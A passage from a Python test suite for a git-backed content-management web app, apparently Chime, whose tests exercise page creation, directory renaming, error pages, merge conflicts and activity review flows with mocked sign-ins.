''' Creating a new page creates a directory with an editable index file inside.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, page_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# in TestApp
def test_can_rename_editable_directories(self):
''' Can rename an editable directory.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
new_page_slug = u'goodbye'
new_page_path = u'{}/index.{}'.format(new_page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/save/{}'.format(working_branch_name, page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': u'',
'en-body': u'',
'fr-title': u'', 'fr-body': u'',
'url-slug': u'{}'.format(new_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(new_page_path in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the old directory is gone
old_dir_location = join(self.clone1.working_dir, page_slug)
self.assertFalse(exists(old_dir_location))
# the new directory exists and is properly structured
new_dir_location = join(self.clone1.working_dir, new_page_slug)
self.assertTrue(exists(new_dir_location) and isdir(new_dir_location))
# an index page is inside
idx_location = u'{}/index.{}'.format(new_dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(idx_location))
# the directory and index page pass the editable test
self.assertTrue(view_functions.is_article_dir(new_dir_location))
# in TestApp
def test_cannot_move_a_directory_inside_iteslf(self):
''' Can't rename an editable directory in a way which moves it inside itself
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
new_page_slug = u'hello/is/better/than/goodbye'
new_page_path = u'{}/index.{}'.format(new_page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/save/{}'.format(working_branch_name, page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': u'',
'en-body': u'',
'fr-title': u'', 'fr-body': u'',
'url-slug': u'{}'.format(new_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# the new page shouldn't have been created
self.assertFalse(new_page_path in response.data)
# there shoudld be a flashed error message
self.assertTrue(u'I cannot move a directory inside itself!' in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the old directory is not gone
old_dir_location = join(self.clone1.working_dir, page_slug)
self.assertTrue(exists(old_dir_location))
# the new directory doesn't exist
new_dir_location = join(self.clone1.working_dir, new_page_slug)
self.assertFalse(exists(new_dir_location) and isdir(new_dir_location))
# in TestApp
def test_editable_directories_are_shown_as_articles(self):
''' Editable directories (directories containing only an editable index file) are displayed as articles.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
# load the index page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the new folder is represented as a file in the HTML
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": page_slug, "file_title": page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# in TestApp
def test_page_not_found_error(self):
''' A 404 page is generated when we get an address that doesn't exist
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'drink quinine for mosquitos'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# get a non-existent page
response = self.test_client.get('tree/{}/malaria'.format(working_branch_name), follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-404') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_garbage_edit_url_raises_page_not_found(self):
''' A 404 page is generated when we get an edit address that doesn't exist
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Take Malarone for People Susceptible to Malaria')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Rubber Plants'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# Try to load a non-existent page within the category
erica.open_link(url='/tree/{}/edit/{}/malaria'.format(branch_name, category_slug), expected_status_code=404)
# in TestApp
def test_garbage_view_url_raises_page_not_found(self):
''' A 404 page is generated when we get a view address that doesn't exist
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Chew Mulberry Leaves for Silkworms')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category
category_name = u'Bombyx Mori'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# Try to load a non-existent asset within the other folder
erica.open_link(url='/tree/{}/view/{}/{}/missing.jpg'.format(branch_name, other_slug, category_slug), expected_status_code=404)
# in TestApp
def test_internal_server_error(self):
''' A 500 page is generated when we provoke a server error
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_internal_server_error):
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_exception_error(self):
''' A 500 page is generated when we provoke an uncaught exception
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_exception):
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_merge_conflict_error(self):
''' We get a merge conflict error page when there's a merge conflict
'''
fake_task_description_1 = u'do things for somebody else'
fake_task_description_2 = u'do other things for somebody even else'
fake_email_1 = u'erica@example.com'
fake_email_2 = u'frances@example.com'
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
fake_page_content_1 = u'Hello world.'
fake_page_content_2 = u'Hello moon.'
#
#
# Log in as person 1
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_email_1})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description_1}, follow_redirects=True)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name_1 = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name_1),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name_1, fake_page_path))
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name_1, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': 'Greetings',
'en-body': u'{}\n'.format(fake_page_content_1),
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
# Request feedback on person 1's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
#
#
# Log in as person 2
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_email_2})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description_2}, follow_redirects=True)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
try:
generated_branch_name_2 = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
with HTTMock(self.mock_google_analytics):
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name_2),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name_2, fake_page_path))
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
fake_new_title = u'Bloople'
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name_2, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': fake_new_title,
'en-body': u'{}\n'.format(fake_page_content_2),
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
# Request feedback on person 2's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
# Endorse person 1's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
# And publish person 1's change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_1), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
#
#
# Log in as person 1
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_email_1})
# Endorse person 2's change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
# And publish person 2's change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name_2), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
# verify that we got an error page about the merge conflict
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('error-500') in response.data)
self.assertTrue(u'MergeConflict' in response.data)
self.assertTrue(u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION) in response.data)
self.assertTrue(u'<td><a href="/tree/{}/edit/{}/">{}</a></td>'.format(generated_branch_name_2, fake_page_slug, fake_new_title))
self.assertTrue(u'<td>Article</td>' in response.data)
self.assertTrue(u'<td>Edited</td>' in response.data)
# these values are set in setUp() above
self.assertTrue(u'support@example.com' in response.data)
self.assertTrue(u'(123) 456-7890' in response.data)
# in TestApp
def test_redirect_into_solo_folder(self):
''' Loading a folder with a sole non-article or -category directory in it redirects to the contents of that directory.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Be Shot Hundreds Of Feet Into The Air for A Geyser Of Highly Pressurized Water')
# Get the branch name
branch_name = erica.get_branch_name()
# create a directory containing only another directory
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
testing_slug = u'testing'
categories_slug = u'categories'
mkdir(join(repo.working_dir, testing_slug))
mkdir(join(repo.working_dir, testing_slug, categories_slug))
# open the top level directory
erica.open_link(url='/tree/{}/edit/'.format(branch_name))
# enter the 'testing' directory
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, testing_slug))
# we should've automatically been redirected into the 'categories' directory
self.assertEqual(erica.path, '/tree/{}/edit/{}/'.format(branch_name, join(testing_slug, categories_slug)))
# in TestApp
def test_article_preview(self):
''' Check edit process with a user previewing their article.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task, "Diving for Dollars".
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Diving for Dollars')
branch_name = frances.get_branch_name()
# Look for an "other" link that we know about - is it a category?
frances.follow_link('/tree/{}/edit/other/'.format(branch_name))
# Create a new category "Ninjas", subcategory "Flipping Out", and article "So Awesome".
frances.add_category('Ninjas')
frances.add_subcategory('Flipping Out')
frances.add_article('So Awesome')
edit_path = frances.path
# Preview the new article.
frances.preview_article('So, So Awesome', 'It was the best of times.')
expected_path = '/tree/{}/view/other/ninjas/flipping-out/so-awesome'.format(branch_name)
self.assertTrue(frances.path.startswith(expected_path), 'Should be on a preview path')
self.assertTrue('best of times' in str(frances.soup), 'Should see current content there')
# Look back at the edit form.
frances.open_link(edit_path)
self.assertTrue('best of times' in str(frances.soup), 'Should see current content there, too')
# in TestApp
def test_alpha_sort_in_admin(self):
''' Make sure items are sorted alphabetically in the Chime admin interface
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Crunching Beetles for Trap-Door Spiders')
branch_name = frances.get_branch_name()
# Look for an "other" link that we know about - is it a category?
frances.follow_link('/tree/{}/edit/other/'.format(branch_name))
# Create a bunch of new categories
frances.add_categories(['Anthicidae', 'Scydmaenidae', 'Paussinae', 'Bostrychidae', 'Scolytidae', 'Anobiidae', 'Meloidae', 'Dermestidae', 'Silphidae'])
# The categories should be sorted by title on the page
rendered_categories = [tag.text for tag in frances.soup.find_all('a', class_='category')]
sorted_categories = sorted(rendered_categories)
self.assertEqual(rendered_categories, sorted_categories)
# in TestApp
def test_overload_front_page(self):
''' Try to overload the front page with multiple simultaneous requests.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in('frances@example.com')
# Start a new task
frances.open_link(constants.ROUTE_ACTIVITY)
frances.start_task(description=u'Beating Crunches for Door-Spider Traps')
# hit the front page a bunch of times
times = 20
pros = []
for blip in range(times):
process = Process(target=frances.open_link, kwargs=dict(url='/', expected_status_code=303))
process.start()
pros.append(process)
# wait until the processes are done
for process in pros:
process.join()
# raise if any errors were raised
for process in pros:
self.assertEqual(0, process.exitcode, u'A process that was trying to load the front page failed!')
# in TestApp
def test_published_activities_displayed(self):
''' Published activities are displayed on the activities list page.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
frances_email = u'frances@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
with HTTMock(self.mock_persona_verify_frances):
frances = ChimeTestClient(self.app.test_client(), self)
frances.sign_in(frances_email)
# Start a new task and create a topic, subtopic and article
erica.open_link(constants.ROUTE_ACTIVITY)
activity_title = u'Flicking Ants Off My Laptop'
args = activity_title, u'Flying', u'Through The Air', u'Goodbye'
branch_name = erica.quick_activity_setup(*args)
# Ask for feedback
erica.follow_link(href='/tree/{}/'.format(branch_name))
erica.request_feedback()
#
# Switch users and publish the article.
#
frances.open_link(url=erica.path)
frances.approve_activity()
frances.publish_activity()
#
# Load the front page and make sure the activity is listed as published
#
erica.open_link(constants.ROUTE_ACTIVITY)
pub_ul = erica.soup.select("#activity-list-published")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=activity_title))
# in TestApp
def test_renaming_activity(self):
''' We can rename an activity
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task('Ingest Wolffish, Capelin, Skate Eggs And Sometimes Rocks')
branch_name = erica.get_branch_name()
# rename the task
new_description = u'Eat Greenland Halibut, Polar And Arctic Cod, Cuttlefish, Shrimp And Armhook Squid'
erica.follow_link('/tree/{}/'.format(branch_name))
erica.rename_activity(task_description=new_description)
# the new name is on the page
self.assertIsNotNone(erica.soup.find(lambda tag: new_description in tag.text))
# the new name is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# in TestApp
def test_renaming_activity_doesnt_affect_review_state(self):
''' Renaming the activity shouldn't reset the review state.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task and create a topic
erica.open_link(constants.ROUTE_ACTIVITY)
args = u'Their Diets Consist Of Almost Any Creature They Are Capable Of Overpowering', u'When Living Near Water, They Will Eat Other Aquatic Animals'
branch_name = erica.quick_activity_setup(*args)
# request feedback for the task
erica.request_feedback()
# verify the feedback state
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
state, _ = repo_functions.get_review_state_and_author_email(repo, 'master', branch_name)
self.assertEqual(state, constants.REVIEW_STATE_FEEDBACK)
# change the activity description
new_description = u'Food is swallowed whole'
erica.follow_link('/tree/{}/'.format(branch_name))
erica.rename_activity(task_description=new_description)
# the new name is in the task metadata
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# the state hasn't changed
state, _ = repo_functions.get_review_state_and_author_email(repo, 'master', branch_name)
self.assertEqual(state, constants.REVIEW_STATE_FEEDBACK)
# in TestApp
def test_request_feedback_with_activity_rename(self):
''' We can rename an activity by submitting a new name via the request feedback form
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
# Start a new task and create a topic
erica.open_link(constants.ROUTE_ACTIVITY)
args = u'Skates are cartilaginous fish', u'The Two Subfamilies Are Rajinae And Arhynchobatinae'
branch_name = erica.quick_activity_setup(*args)
# request feedback for the task with a new activity description
new_description = u'Skates Are Oviparous, That Is They Lay Eggs'
erica.request_feedback(task_description=new_description)
# the 'requested feedback' message is on the page
self.assertIsNotNone(erica.soup.find(text=u'{} {}'.format(erica_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE)))
# the new description is on the page
self.assertIsNotNone(erica.soup.find(lambda tag: new_description in tag.text))
# the new description is in the task metadata
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
task_metadata = repo_functions.get_task_metadata_for_branch(repo, branch_name)
self.assertEqual(task_metadata['task_description'], new_description)
# in TestApp
def test_save_unchanged_article(self):
''' Saving an unchanged article doesn't raise any errors.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
# Start a new task and create a topic, subtopic and article
erica.open_link(constants.ROUTE_ACTIVITY)
article_title = u'Open-Ocean'
args = u'The Eggs Are Spherical And Buoyant', u'The Fry Are Tiny', u'Pelagic', article_title
erica.quick_activity_setup(*args)
# Edit the article
article_text = u'Although most puffers are drab, many have bright colors and distinctive markings.'
erica.edit_article(article_title, article_text)
# Edit the article again with the same variables
erica.edit_article(article_title, article_text)
# in TestApp
def test_browse_is_default_view(self):
''' Loading root redirects to browsing the live site.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
erica.open_link('/', expected_status_code=303)
# it's the right url
self.assertEqual(erica.path, '/browse/')
# the test client can't derive a branch name
self.assertRaises(AssertionError, lambda: erica.get_branch_name())
# it's the right template
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# in TestApp
def test_no_activity_bar_when_browsing(self):
''' There's no activity bar when you're browsing the live site.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
erica.open_link('/', expected_status_code=303)
# there's no activity bar
self.assertIsNone(erica.soup.find("div", {"data-test-id": "activity-bar"}))
# in TestApp
def test_new_category_in_browse_starts_activity(self):
''' Starting a new category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the "other" folder
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create a category
category_name = u'Confuse The Predator\'s Visual Acuity'
erica.add_category(category_name=category_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new category name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(category_name) in erica.path)
# a flash about the topic's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=category_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_new_subcategory_in_browse_starts_activity(self):
''' Starting a new subcategory from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create a subcategory
subcategory_name = u'Rolling Into A Spiny Ball'
erica.add_subcategory(subcategory_name=subcategory_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new subcategory name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(subcategory_name) in erica.path)
# a flash about the topic's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_CATEGORY.format(title=subcategory_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_new_article_in_browse_starts_activity(self):
''' Starting a new subcategory from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug, subtopic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# create a subcategory
article_name = u'Grunts, Snuffles And Squeals'
erica.add_article(article_name=article_name)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name and the new subcategory name slug are in the path
self.assertTrue(branch_name in erica.path)
self.assertTrue(slugify(article_name) in erica.path)
# a flash about the topic's creation is on the page
self.assertEqual(PATTERN_FLASH_CREATED_ARTICLE.format(title=article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_delete_category_in_browse_starts_activity(self):
''' Deleting a category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
